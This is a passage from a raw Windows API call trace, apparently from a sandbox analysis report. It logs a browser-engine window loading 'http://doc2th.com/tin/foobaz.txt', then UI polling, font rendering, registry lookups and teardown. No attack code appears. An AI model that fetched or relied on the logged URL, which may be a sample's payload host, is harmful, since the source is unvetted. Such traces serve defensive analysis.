lpPoint=0x40eec8 | out: lpPoint=0x40eec8) returned 1 [0047.279] GetKeyState (nVirtKey=16) returned 0 [0047.279] GetKeyState (nVirtKey=17) returned 0 [0047.279] GetKeyState (nVirtKey=18) returned 0 [0047.279] GetKeyState (nVirtKey=160) returned 0 [0047.279] GetKeyState (nVirtKey=162) returned 0 [0047.279] GetKeyState (nVirtKey=164) returned 0 [0047.279] GetCapture () returned 0x0 [0047.279] GetCurrentThreadId () returned 0xa1c [0047.279] GetCurrentThreadId () returned 0xa1c [0047.279] GetCurrentThreadId () returned 0xa1c [0047.280] GetCursorPos (in: lpPoint=0x40eec8 | out: lpPoint=0x40eec8*(x=791, y=282)) returned 1 [0047.280] ScreenToClient (in: hWnd=0x10204, lpPoint=0x40eec8 | out: lpPoint=0x40eec8) returned 1 [0047.280] GetKeyState (nVirtKey=16) returned 0 [0047.280] GetKeyState (nVirtKey=17) returned 0 [0047.280] GetKeyState (nVirtKey=18) returned 0 [0047.280] GetKeyState (nVirtKey=160) returned 0 [0047.280] GetKeyState (nVirtKey=162) returned 0 [0047.280] GetKeyState (nVirtKey=164) returned 0 [0047.280] GetCurrentThreadId () returned 0xa1c [0047.280] GetCurrentThreadId () returned 0xa1c [0047.280] GetCurrentThreadId () returned 0xa1c [0047.280] GetCursorPos (in: lpPoint=0x40eec8 | out: lpPoint=0x40eec8*(x=791, y=282)) returned 1 [0047.280] ScreenToClient (in: hWnd=0x10204, lpPoint=0x40eec8 | out: lpPoint=0x40eec8) returned 1 [0047.280] GetKeyState (nVirtKey=16) returned 0 [0047.280] GetKeyState (nVirtKey=17) returned 0 [0047.280] GetKeyState (nVirtKey=18) returned 0 [0047.280] GetKeyState (nVirtKey=160) returned 0 [0047.280] GetKeyState (nVirtKey=162) returned 0 [0047.280] GetKeyState (nVirtKey=164) returned 0 [0047.280] GetCurrentThreadId () returned 0xa1c [0047.280] GetCurrentThreadId () returned 0xa1c [0047.280] GetCurrentThreadId () returned 0xa1c [0047.280] GetFocus () returned 0x10204 [0047.280] GetFocus () returned 0x10204 [0047.280] IUnknown:AddRef (This=0x11ae64) returned 0x7 [0047.281] IUri:GetScheme (in: This=0x11ae64, pdwScheme=0x40e7f4 | out: 
pdwScheme=0x40e7f4*=0x2) returned 0x0 [0047.281] IUri:GetDisplayUri (in: This=0x11ae64, pbstrDisplayString=0x40e800 | out: pbstrDisplayString=0x40e800*="http://doc2th.com/tin/foobaz.txt") returned 0x0 [0047.281] GetWindowTextW (in: hWnd=0x10200, lpString=0x40e3a0, nMaxCount=512 | out: lpString="http://doc2th.com/tin/foobaz.txt") returned 32 [0047.281] DefWindowProcW (hWnd=0x10200, Msg=0xd, wParam=0x200, lParam=0x40e3a0) returned 0x20 [0047.281] IUnknown:Release (This=0x11ae64) returned 0x6 [0047.281] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0047.281] SendMessageW (hWnd=0x101fc, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0 [0047.281] DefWindowProcW (hWnd=0x101fc, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0 [0047.281] DefWindowProcW (hWnd=0x101fc, Msg=0xd, wParam=0x104, lParam=0x22c6a0) returned 0x0 [0047.282] DefWindowProcW (hWnd=0x101fc, Msg=0xd, wParam=0x104, lParam=0x22c6a0) returned 0x0 [0047.282] SendMessageW (hWnd=0x10200, Msg=0x80, wParam=0x0, lParam=0x10027) returned 0x0 [0047.282] DefWindowProcW (hWnd=0x10200, Msg=0x80, wParam=0x0, lParam=0x10027) returned 0x0 [0047.282] SetWindowLongW (hWnd=0x10200, nIndex=-16, dwNewLong=-2100363264) returned -2033254400 [0047.282] DefWindowProcW (hWnd=0x10200, Msg=0x7c, wParam=0xfffffff0, lParam=0x40f1e4) returned 0x0 [0047.282] DefWindowProcW (hWnd=0x10200, Msg=0x7d, wParam=0xfffffff0, lParam=0x40f1e4) returned 0x0 [0047.291] DefWindowProcW (hWnd=0x10200, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0x10027 [0047.292] SetWindowLongW (hWnd=0x10200, nIndex=-20, dwNewLong=262144) returned 262400 [0047.292] DefWindowProcW (hWnd=0x10200, Msg=0x7c, wParam=0xffffffec, lParam=0x40f1e4) returned 0x0 [0047.292] DefWindowProcW (hWnd=0x10200, Msg=0x7d, wParam=0xffffffec, lParam=0x40f1e4) returned 0x0 [0047.292] SetWindowPos (hWnd=0x10200, hWndInsertAfter=0xfffffffe, X=0, Y=0, cx=0, cy=0, uFlags=0x37) returned 1 [0047.292] DefWindowProcW (hWnd=0x10200, Msg=0x46, wParam=0x0, lParam=0x40f1fc) returned 
0x0 [0047.292] DefWindowProcW (hWnd=0x10200, Msg=0x83, wParam=0x1, lParam=0x40f1d0) returned 0x0 [0047.293] DefWindowProcW (hWnd=0x10200, Msg=0x47, wParam=0x0, lParam=0x40f1fc) returned 0x0 [0047.293] GlobalAddAtomW (lpString=0x0) returned 0x0 [0047.293] SetPropW (hWnd=0x101fc, lpString=0x0, hData=0x101fc) returned 0 [0047.293] ShowWindow (hWnd=0x10200, nCmdShow=0) returned 0 [0047.293] UpdateWindow (hWnd=0x10200) returned 1 [0047.293] GetCurrentThreadId () returned 0xa1c [0047.293] GetCurrentThreadId () returned 0xa1c [0047.293] GetCurrentThreadId () returned 0xa1c [0047.294] GetFocus () returned 0x10204 [0047.294] GetCursorPos (in: lpPoint=0x40f248 | out: lpPoint=0x40f248*(x=791, y=282)) returned 1 [0047.294] ScreenToClient (in: hWnd=0x10204, lpPoint=0x40f248 | out: lpPoint=0x40f248) returned 1 [0047.294] GetClientRect (in: hWnd=0x10204, lpRect=0x40f238 | out: lpRect=0x40f238) returned 1 [0047.294] PostMessageW (hWnd=0x10204, Msg=0x20, wParam=0x204, lParam=0x1) returned 1 [0047.294] GetCursorPos (in: lpPoint=0x40f0d8 | out: lpPoint=0x40f0d8*(x=791, y=282)) returned 1 [0047.294] ScreenToClient (in: hWnd=0x10204, lpPoint=0x40f0d8 | out: lpPoint=0x40f0d8) returned 1 [0047.294] GetKeyState (nVirtKey=16) returned 0 [0047.294] GetKeyState (nVirtKey=17) returned 0 [0047.294] GetKeyState (nVirtKey=18) returned 0 [0047.294] GetKeyState (nVirtKey=160) returned 0 [0047.294] GetKeyState (nVirtKey=162) returned 0 [0047.294] GetKeyState (nVirtKey=164) returned 0 [0047.294] GetCurrentThreadId () returned 0xa1c [0047.294] GetCurrentThreadId () returned 0xa1c [0047.294] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x75580000 [0047.295] GetProcAddress (hModule=0x75580000, lpProcName="VariantClear") returned 0x75583eae [0047.295] GetFocus () returned 0x10204 [0047.295] GetCursorPos (in: lpPoint=0x40f108 | out: lpPoint=0x40f108*(x=791, y=282)) returned 1 [0047.295] ScreenToClient (in: hWnd=0x10204, lpPoint=0x40f108 | out: lpPoint=0x40f108) returned 1 [0047.295] GetKeyState 
(nVirtKey=16) returned 0 [0047.295] GetKeyState (nVirtKey=17) returned 0 [0047.295] GetKeyState (nVirtKey=18) returned 0 [0047.295] GetKeyState (nVirtKey=160) returned 0 [0047.295] GetKeyState (nVirtKey=162) returned 0 [0047.295] GetKeyState (nVirtKey=164) returned 0 [0047.295] GetCursorPos (in: lpPoint=0x40f0f0 | out: lpPoint=0x40f0f0*(x=791, y=282)) returned 1 [0047.295] ScreenToClient (in: hWnd=0x10204, lpPoint=0x40f0f0 | out: lpPoint=0x40f0f0) returned 1 [0047.295] GetKeyState (nVirtKey=16) returned 0 [0047.295] GetKeyState (nVirtKey=17) returned 0 [0047.295] GetKeyState (nVirtKey=18) returned 0 [0047.295] GetKeyState (nVirtKey=160) returned 0 [0047.295] GetKeyState (nVirtKey=162) returned 0 [0047.295] GetKeyState (nVirtKey=164) returned 0 [0047.295] GetCurrentThreadId () returned 0xa1c [0047.295] GetCurrentThreadId () returned 0xa1c [0047.295] IsWinEventHookInstalled (event=0x8005) returned 0 [0047.295] StrCmpICW (pszStr1="about:blank", pszStr2="http://doc2th.com/tin/foobaz.txt") returned -7 [0047.295] StrCmpICW (pszStr1="about:blank", pszStr2="http://doc2th.com/tin/foobaz.txt") returned -7 [0047.295] GetCurrentThreadId () returned 0xa1c [0047.295] GetCurrentThreadId () returned 0xa1c [0047.295] GetCurrentThreadId () returned 0xa1c [0047.296] GetCurrentThreadId () returned 0xa1c [0047.341] LsGetRubyLsimethods () returned 0x0 [0047.341] LsGetTatenakayokoLsimethods () returned 0x0 [0047.341] LsGetHihLsimethods () returned 0x0 [0047.341] LsGetWarichuLsimethods () returned 0x0 [0047.341] LsGetReverseLsimethods () returned 0x0 [0047.341] LsCreateContext () returned 0x0 [0047.342] LsSetModWidthPairs () returned 0x0 [0047.343] LsSetBreaking () returned 0x0 [0047.343] LsSetDoc () returned 0x0 [0047.343] LsCreateLine () returned 0x0 [0047.344] EnumFontsW (hdc=0x210107a8, lpLogfont="Times New Roman", lpProc=0x632a0b47, lParam=0x40e704) returned 1 [0047.344] CreateFontIndirectW (lplf=0x40e6a0) returned 0x140a027b [0047.345] SelectObject (hdc=0x210107a8, h=0x140a027b) 
returned 0x18a002e [0047.345] GetTextMetricsW (in: hdc=0x210107a8, lptm=0x40e608 | out: lptm=0x40e608) returned 1 [0047.345] GetOutlineTextMetricsW (in: hdc=0x210107a8, cjCopy=0xd8, potm=0x40e508 | out: potm=0x40e508) returned 0xd8 [0047.346] SelectObject (hdc=0x210107a8, h=0x18a002e) returned 0x140a027b [0047.346] SelectObject (hdc=0x210107a8, h=0x140a027b) returned 0x18a002e [0047.346] GetTextFaceW (in: hdc=0x210107a8, c=32, lpName=0x40e758 | out: lpName="Times New Roman") returned 16 [0047.346] SelectObject (hdc=0x210107a8, h=0x18a002e) returned 0x140a027b [0047.346] SelectObject (hdc=0x210107a8, h=0x140a027b) returned 0x18a002e [0047.346] GetTextCharsetInfo (in: hdc=0x210107a8, lpSig=0x40e6c0, dwFlags=0x0 | out: lpSig=0x40e6c0) returned 0 [0047.346] SelectObject (hdc=0x210107a8, h=0x18a002e) returned 0x140a027b [0047.346] SelectObject (hdc=0x210107a8, h=0x140a027b) returned 0x18a002e [0047.346] GetFontUnicodeRanges (in: hdc=0x210107a8, lpgs=0x0 | out: lpgs=0x0) returned 0x27c [0047.346] GetFontUnicodeRanges (in: hdc=0x210107a8, lpgs=0x14b8d0 | out: lpgs=0x14b8d0) returned 0x27c [0047.346] SelectObject (hdc=0x210107a8, h=0x18a002e) returned 0x140a027b [0047.346] SelectObject (hdc=0x210107a8, h=0x140a027b) returned 0x18a002e [0047.346] GetCharWidth32W (in: hdc=0x210107a8, iFirst=0x20, iLast=0x7e, lpBuffer=0x40e698 | out: lpBuffer=0x40e698) returned 1 [0047.348] SelectObject (hdc=0x210107a8, h=0x18a002e) returned 0x140a027b [0047.348] LsQueryLineDup () returned 0x0 [0047.348] LsDestroyLine () returned 0x0 [0047.348] IntersectRect (in: lprcDst=0x40f464, lprcSrc1=0x40f464, lprcSrc2=0x40f434 | out: lprcDst=0x40f464) returned 1 [0047.348] IntersectRect (in: lprcDst=0x15b018, lprcSrc1=0x15b018, lprcSrc2=0x40f454 | out: lprcDst=0x15b018) returned 1 [0047.348] IntersectRect (in: lprcDst=0x15b018, lprcSrc1=0x15b018, lprcSrc2=0x40f474 | out: lprcDst=0x15b018) returned 1 [0047.348] IntersectRect (in: lprcDst=0x40f124, lprcSrc1=0x40f124, lprcSrc2=0x40f0f4 | out: 
lprcDst=0x40f124) returned 1 [0047.348] IntersectRect (in: lprcDst=0x15b018, lprcSrc1=0x15b018, lprcSrc2=0x40f114 | out: lprcDst=0x15b018) returned 1 [0047.348] IntersectRect (in: lprcDst=0x15b018, lprcSrc1=0x15b018, lprcSrc2=0x40f134 | out: lprcDst=0x15b018) returned 1 [0047.348] IntersectRect (in: lprcDst=0x40f038, lprcSrc1=0x40f038, lprcSrc2=0x15b008 | out: lprcDst=0x40f038) returned 1 [0047.348] UnionRect (in: lprcDst=0x40f340, lprcSrc1=0x40f340, lprcSrc2=0x40f2ec | out: lprcDst=0x40f340) returned 1 [0047.348] IntersectRect (in: lprcDst=0x40f2d8, lprcSrc1=0x40f2d8, lprcSrc2=0x40f270 | out: lprcDst=0x40f2d8) returned 1 [0047.348] IntersectRect (in: lprcDst=0x40f1e8, lprcSrc1=0x40f1e8, lprcSrc2=0x40f270 | out: lprcDst=0x40f1e8) returned 1 [0047.348] IntersectRect (in: lprcDst=0x40f280, lprcSrc1=0x40f280, lprcSrc2=0x40f1e8 | out: lprcDst=0x40f280) returned 1 [0047.349] IntersectRect (in: lprcDst=0x40f2d8, lprcSrc1=0x40f2d8, lprcSrc2=0x40f270 | out: lprcDst=0x40f2d8) returned 1 [0047.349] IntersectRect (in: lprcDst=0x40f2d8, lprcSrc1=0x40f2d8, lprcSrc2=0x40f270 | out: lprcDst=0x40f2d8) returned 1 [0047.349] IntersectRect (in: lprcDst=0x40f1e8, lprcSrc1=0x40f1e8, lprcSrc2=0x40f270 | out: lprcDst=0x40f1e8) returned 1 [0047.349] IntersectRect (in: lprcDst=0x40f280, lprcSrc1=0x40f280, lprcSrc2=0x40f1e8 | out: lprcDst=0x40f280) returned 1 [0047.349] IntersectRect (in: lprcDst=0x40f2d8, lprcSrc1=0x40f2d8, lprcSrc2=0x40f270 | out: lprcDst=0x40f2d8) returned 1 [0047.349] UnionRect (in: lprcDst=0x40f680, lprcSrc1=0x40f680, lprcSrc2=0x40f62c | out: lprcDst=0x40f680) returned 1 [0047.349] RedrawWindow (hWnd=0x10204, lprcUpdate=0x40f700, hrgnUpdate=0x0, flags=0x21) returned 1 [0047.349] GetCursorPos (in: lpPoint=0x40f630 | out: lpPoint=0x40f630*(x=791, y=282)) returned 1 [0047.349] ScreenToClient (in: hWnd=0x10204, lpPoint=0x40f630 | out: lpPoint=0x40f630) returned 1 [0047.349] GetKeyState (nVirtKey=16) returned 0 [0047.349] GetKeyState (nVirtKey=17) returned 0 [0047.349] 
GetKeyState (nVirtKey=18) returned 0 [0047.349] GetKeyState (nVirtKey=160) returned 0 [0047.349] GetKeyState (nVirtKey=162) returned 0 [0047.349] GetKeyState (nVirtKey=164) returned 0 [0047.349] GetCurrentThreadId () returned 0xa1c [0047.349] GetCurrentThreadId () returned 0xa1c [0047.349] GetCurrentThreadId () returned 0xa1c [0047.349] GetFocus () returned 0x10204 [0047.349] GetCurrentThreadId () returned 0xa1c [0047.349] GetCursorPos (in: lpPoint=0x40f5f0 | out: lpPoint=0x40f5f0*(x=791, y=282)) returned 1 [0047.349] ScreenToClient (in: hWnd=0x10204, lpPoint=0x40f5f0 | out: lpPoint=0x40f5f0) returned 1 [0047.349] GetKeyState (nVirtKey=16) returned 0 [0047.349] GetKeyState (nVirtKey=17) returned 0 [0047.349] GetKeyState (nVirtKey=18) returned 0 [0047.349] GetKeyState (nVirtKey=160) returned 0 [0047.349] GetKeyState (nVirtKey=162) returned 0 [0047.349] GetKeyState (nVirtKey=164) returned 0 [0047.350] GetCursorPos (in: lpPoint=0x40f5d0 | out: lpPoint=0x40f5d0*(x=791, y=282)) returned 1 [0047.350] ScreenToClient (in: hWnd=0x10204, lpPoint=0x40f5d0 | out: lpPoint=0x40f5d0) returned 1 [0047.350] GetKeyState (nVirtKey=16) returned 0 [0047.350] GetKeyState (nVirtKey=17) returned 0 [0047.350] GetKeyState (nVirtKey=18) returned 0 [0047.350] GetKeyState (nVirtKey=160) returned 0 [0047.350] GetKeyState (nVirtKey=162) returned 0 [0047.350] GetKeyState (nVirtKey=164) returned 0 [0047.350] GetCurrentThreadId () returned 0xa1c [0047.350] GetCurrentThreadId () returned 0xa1c [0047.350] IsWinEventHookInstalled (event=0x8005) returned 0 [0047.350] GetCurrentThreadId () returned 0xa1c [0047.350] GetCurrentThreadId () returned 0xa1c [0047.350] GetCurrentThreadId () returned 0xa1c [0047.350] GetCursorPos (in: lpPoint=0x40f568 | out: lpPoint=0x40f568*(x=791, y=282)) returned 1 [0047.350] ScreenToClient (in: hWnd=0x10204, lpPoint=0x40f568 | out: lpPoint=0x40f568) returned 1 [0047.350] GetKeyState (nVirtKey=16) returned 0 [0047.350] GetKeyState (nVirtKey=17) returned 0 [0047.350] 
GetKeyState (nVirtKey=18) returned 0 [0047.350] GetKeyState (nVirtKey=160) returned 0 [0047.350] GetKeyState (nVirtKey=162) returned 0 [0047.350] GetKeyState (nVirtKey=164) returned 0 [0047.350] GetCursorPos (in: lpPoint=0x40f550 | out: lpPoint=0x40f550*(x=791, y=282)) returned 1 [0047.351] ScreenToClient (in: hWnd=0x10204, lpPoint=0x40f550 | out: lpPoint=0x40f550) returned 1 [0047.351] GetKeyState (nVirtKey=16) returned 0 [0047.351] GetKeyState (nVirtKey=17) returned 0 [0047.351] GetKeyState (nVirtKey=18) returned 0 [0047.351] GetKeyState (nVirtKey=160) returned 0 [0047.351] GetKeyState (nVirtKey=162) returned 0 [0047.351] GetKeyState (nVirtKey=164) returned 0 [0047.351] GetCurrentThreadId () returned 0xa1c [0047.351] GetCurrentThreadId () returned 0xa1c [0047.352] GetCurrentThreadId () returned 0xa1c [0047.357] GetMessageW (in: lpMsg=0x40f904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x40f904) returned 1 [0047.357] TranslateMessage (lpMsg=0x40f904) returned 0 [0047.357] DispatchMessageW (lpMsg=0x40f904) returned 0x0 [0047.357] GetCursorPos (in: lpPoint=0x40f200 | out: lpPoint=0x40f200*(x=791, y=282)) returned 1 [0047.357] ScreenToClient (in: hWnd=0x10204, lpPoint=0x40f200 | out: lpPoint=0x40f200) returned 1 [0047.357] GetKeyState (nVirtKey=16) returned 0 [0047.357] GetKeyState (nVirtKey=17) returned 0 [0047.357] GetKeyState (nVirtKey=18) returned 0 [0047.357] GetKeyState (nVirtKey=160) returned 0 [0047.357] GetKeyState (nVirtKey=162) returned 0 [0047.357] GetKeyState (nVirtKey=164) returned 0 [0047.358] GetCursorPos (in: lpPoint=0x40f090 | out: lpPoint=0x40f090*(x=791, y=282)) returned 1 [0047.358] ScreenToClient (in: hWnd=0x10204, lpPoint=0x40f090 | out: lpPoint=0x40f090) returned 1 [0047.358] GetKeyState (nVirtKey=16) returned 0 [0047.358] GetKeyState (nVirtKey=17) returned 0 [0047.358] GetKeyState (nVirtKey=18) returned 0 [0047.358] GetKeyState (nVirtKey=160) returned 0 [0047.358] GetKeyState (nVirtKey=162) returned 0 [0047.358] GetKeyState 
(nVirtKey=164) returned 0 [0047.358] GetCurrentThreadId () returned 0xa1c [0047.358] GetCurrentThreadId () returned 0xa1c [0047.358] GetCurrentThreadId () returned 0xa1c [0047.358] DestroyWindow (hWnd=0x10200) returned 1 [0047.358] DefWindowProcW (hWnd=0x10200, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0 [0047.358] GetWindowLongW (hWnd=0x10204, nIndex=-21) returned 1183792 [0047.358] GetKeyState (nVirtKey=1) returned 0 [0047.358] GetKeyState (nVirtKey=2) returned 0 [0047.358] GetKeyState (nVirtKey=16) returned 0 [0047.358] GetKeyState (nVirtKey=17) returned 0 [0047.358] GetKeyState (nVirtKey=4) returned 0 [0047.358] GetKeyState (nVirtKey=18) returned 0 [0047.358] GetMessageTime () returned 108639 [0047.358] GetMessagePos () returned 0x11a0317 [0047.359] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x150ec8, hWnd=0x10204, msg=0x281, wParam=0x0, lParam=0xc000000f*=0, plResult=0x40f0cc | out: plResult=0x40f0cc) returned 0x0 [0047.359] GetWindowLongW (hWnd=0x10204, nIndex=-21) returned 1183792 [0047.359] GetKeyState (nVirtKey=1) returned 0 [0047.359] GetKeyState (nVirtKey=2) returned 0 [0047.359] GetKeyState (nVirtKey=16) returned 0 [0047.359] GetKeyState (nVirtKey=17) returned 0 [0047.359] GetKeyState (nVirtKey=4) returned 0 [0047.359] GetKeyState (nVirtKey=18) returned 0 [0047.359] GetMessageTime () returned 108639 [0047.359] GetMessagePos () returned 0x11a0317 [0047.360] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x150ec8, hWnd=0x10204, msg=0x282, wParam=0x1, lParam=0x0, plResult=0x40eb24 | out: plResult=0x40eb24) returned 0x0 [0047.360] SetTimer (hWnd=0x10204, nIDEvent=0x1000, uElapse=0x64, lpTimerFunc=0x0) returned 0x1000 [0047.360] GetCurrentThreadId () returned 0xa1c [0047.360] GetCurrentThreadId () returned 0xa1c [0047.360] PostQuitMessage (nExitCode=0) [0047.360] GetWindowLongW (hWnd=0x10204, nIndex=-21) returned 1183792 [0047.360] RevokeDragDrop (hwnd=0x10204) returned 0x0 [0047.360] GetCurrentThreadId () returned 
0xa1c [0047.360] GetWindowLongW (hWnd=0x10204, nIndex=-21) returned 1183792 [0047.360] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x150ec8, hWnd=0x10204, msg=0x82, wParam=0x0, lParam=0x0, plResult=0x40f634 | out: plResult=0x40f634) returned 0x1 [0047.360] DefWindowProcW (hWnd=0x10204, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0047.360] GetCurrentThreadId () returned 0xa1c [0047.360] SetWindowLongW (hWnd=0x10204, nIndex=-21, dwNewLong=0) returned 1183792 [0047.360] DefWindowProcW (hWnd=0x10200, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0047.360] GetMessageW (in: lpMsg=0x40f904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x40f904) returned 0 [0047.361] PostMessageW (hWnd=0x10202, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1 [0047.361] GetCurrentThreadId () returned 0xa1c [0047.361] GetCursorPos (in: lpPoint=0x40f6b0 | out: lpPoint=0x40f6b0*(x=791, y=282)) returned 1 [0047.361] ScreenToClient (in: hWnd=0x0, lpPoint=0x40f6b0 | out: lpPoint=0x40f6b0) returned 0 [0047.361] GetKeyState (nVirtKey=16) returned 0 [0047.361] GetKeyState (nVirtKey=17) returned 0 [0047.361] GetKeyState (nVirtKey=18) returned 0 [0047.361] GetKeyState (nVirtKey=160) returned 0 [0047.361] GetKeyState (nVirtKey=162) returned 0 [0047.361] GetKeyState (nVirtKey=164) returned 0 [0047.361] GetCursorPos (in: lpPoint=0x40f698 | out: lpPoint=0x40f698*(x=791, y=282)) returned 1 [0047.361] ScreenToClient (in: hWnd=0x0, lpPoint=0x40f698 | out: lpPoint=0x40f698) returned 0 [0047.361] GetKeyState (nVirtKey=16) returned 0 [0047.361] GetKeyState (nVirtKey=17) returned 0 [0047.361] GetKeyState (nVirtKey=18) returned 0 [0047.361] GetKeyState (nVirtKey=160) returned 0 [0047.361] GetKeyState (nVirtKey=162) returned 0 [0047.361] GetKeyState (nVirtKey=164) returned 0 [0047.361] GetCurrentThreadId () returned 0xa1c [0047.362] GetCurrentThreadId () returned 0xa1c [0047.362] IsWinEventHookInstalled (event=0x8005) returned 0 [0047.362] GetCurrentThreadId () returned 
0xa1c [0047.362] CActiveIMMAppEx_Trident:IActiveIMMApp:Deactivate (This=0x150ec8) returned 0x0 [0047.362] IntersectRect (in: lprcDst=0x40f718, lprcSrc1=0x40f718, lprcSrc2=0x40f7a0 | out: lprcDst=0x40f718) returned 1 [0047.362] IntersectRect (in: lprcDst=0x40f7b0, lprcSrc1=0x40f7b0, lprcSrc2=0x40f718 | out: lprcDst=0x40f7b0) returned 1 [0047.362] IntersectRect (in: lprcDst=0x40f808, lprcSrc1=0x40f808, lprcSrc2=0x40f7a0 | out: lprcDst=0x40f808) returned 1 [0047.362] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40f824 | out: phkResult=0x40f824*=0x4e8) returned 0x0 [0047.362] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40f828 | out: phkResult=0x40f828*=0x47c) returned 0x0 [0047.362] RegOpenKeyExW (in: hKey=0x47c, lpSubKey="FEATURE_ADDITIONAL_IE8_MEMORY_CLEANUP", ulOptions=0x0, samDesired=0x1, phkResult=0x40f7e4 | out: phkResult=0x40f7e4*=0x0) returned 0x2 [0047.362] RegOpenKeyExW (in: hKey=0x4e8, lpSubKey="FEATURE_ADDITIONAL_IE8_MEMORY_CLEANUP", ulOptions=0x0, samDesired=0x1, phkResult=0x40f7e4 | out: phkResult=0x40f7e4*=0x0) returned 0x2 [0047.362] RegCloseKey (hKey=0x0) returned 0x6 [0047.362] RegCloseKey (hKey=0x0) returned 0x6 [0047.362] RegCloseKey (hKey=0x4e8) returned 0x0 [0047.362] RegCloseKey (hKey=0x47c) returned 0x0 [0047.362] GetCurrentThreadId () returned 0xa1c [0047.362] GetCurrentThreadId () returned 0xa1c [0047.362] GetCurrentThreadId () returned 0xa1c [0047.362] GetCurrentThreadId () returned 0xa1c [0047.362] GetCurrentThreadId () returned 0xa1c [0047.362] IUnknown:Release (This=0x142738) returned 0x1 [0047.362] GetCurrentThreadId () returned 0xa1c [0047.362] GetCurrentThreadId () returned 0xa1c [0047.362] GetCurrentThreadId () returned 0xa1c [0047.363] CoGetObjectContext (in: riid=0x6e8d0270*(Data1=0x0, Data2=0x0, Data3=0x0, 
Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x40f818 | out: ppv=0x40f818*=0x116278) returned 0x0 [0047.363] IUnknown:Release (This=0x17d608) returned 0x0 [0047.366] StdGlobalInterfaceTable:IGlobalInterfaceTable:RevokeInterfaceFromGlobal (This=0x76836460, dwCookie=0x100) returned 0x0 [0047.366] IUnknown:Release (This=0x59ffb8) returned 0x1 [0047.366] IUnknown:Release (This=0x116278) returned 0x1 [0047.366] IUnknown:Release (This=0x116278) returned 0x0 [0047.366] ISystemDebugEventFire:EndSession (This=0x142738) returned 0x0 [0047.366] IUnknown:Release (This=0x142738) returned 0x0 [0047.366] GetUserDefaultLCID () returned 0x409 [0047.366] GetACP () returned 0x4e4 [0047.366] GetCurrentThreadId () returned 0xa1c [0047.367] IUnknown:Release (This=0x122f88) returned 0x0 [0047.367] IUnknown:Release (This=0x12176c) returned 0x0 [0047.367] IUnknown:Release (This=0x636896bc) returned 0x1 [0047.367] CreateUri (in: pwzURI="about:blank", dwFlags=0x2b84, dwReserved=0x0, ppURI=0x40f8bc | out: ppURI=0x40f8bc*=0x11ab04) returned 0x0 [0047.368] IUri:GetScheme (in: This=0x11ab04, pdwScheme=0x40f854 | out: pdwScheme=0x40f854*=0x11) returned 0x0 [0047.368] IUnknown:QueryInterface (in: This=0x11ab04, riid=0x6330d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x40f85c | out: ppvObject=0x40f85c*=0x11ab04) returned 0x0 [0047.368] IUnknown:Release (This=0x11ab04) returned 0x2 [0047.368] IUnknown:AddRef (This=0x11ab04) returned 0x3 [0047.368] IUnknown:Release (This=0x11ab04) returned 0x2 [0047.368] IUri:IsEqual (in: This=0x11ae64, pUri=0x11ab04, pfEqual=0x40f89c | out: pfEqual=0x40f89c*=0) returned 0x0 [0047.368] IUnknown:Release (This=0x11ae64) returned 0x5 [0047.368] IUnknown:AddRef (This=0x11ab04) returned 0x3 [0047.368] IUri:GetAbsoluteUri (in: This=0x11ab04, pbstrAbsoluteUri=0x120bd0 | out: pbstrAbsoluteUri=0x120bd0*="about:blank") returned 0x0 
[0047.368] IUnknown:Release (This=0x11ab04) returned 0x2 [0047.368] GetCurrentProcessId () returned 0xa18 [0047.370] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x76cf0000 [0047.370] GetProcAddress (hModule=0x76cf0000, lpProcName="InternetUnlockRequestFile") returned 0x76d37457 [0047.370] InternetUnlockRequestFile (in: hLockRequestInfo=0x158db0 | out: hLockRequestInfo=0x158db0) returned 1 [0047.371] IUnknown:Release (This=0x11ae64) returned 0x4 [0047.371] IUnknown:Release (This=0x11ae64) returned 0x3 [0047.372] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x121764, dwReserved=0x0 | out: ppSM=0x121764*=0x14fb40) returned 0x0 [0047.372] IInternetSecurityManager:SetSecuritySite (This=0x14fb40, pSite=0x12176c) returned 0x0 [0047.372] IUnknown:AddRef (This=0x12176c) returned 0x31 [0047.372] IUnknown:QueryInterface (in: This=0x12176c, riid=0x764a61d0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x40f534 | out: ppvObject=0x40f534*=0x121770) returned 0x0 [0047.372] IServiceProvider:QueryService (in: This=0x121770, guidService=0x764af13c*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), riid=0x764af13c*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), ppvObject=0x14fb68 | out: ppvObject=0x14fb68*=0x0) returned 0x80004002 [0047.372] 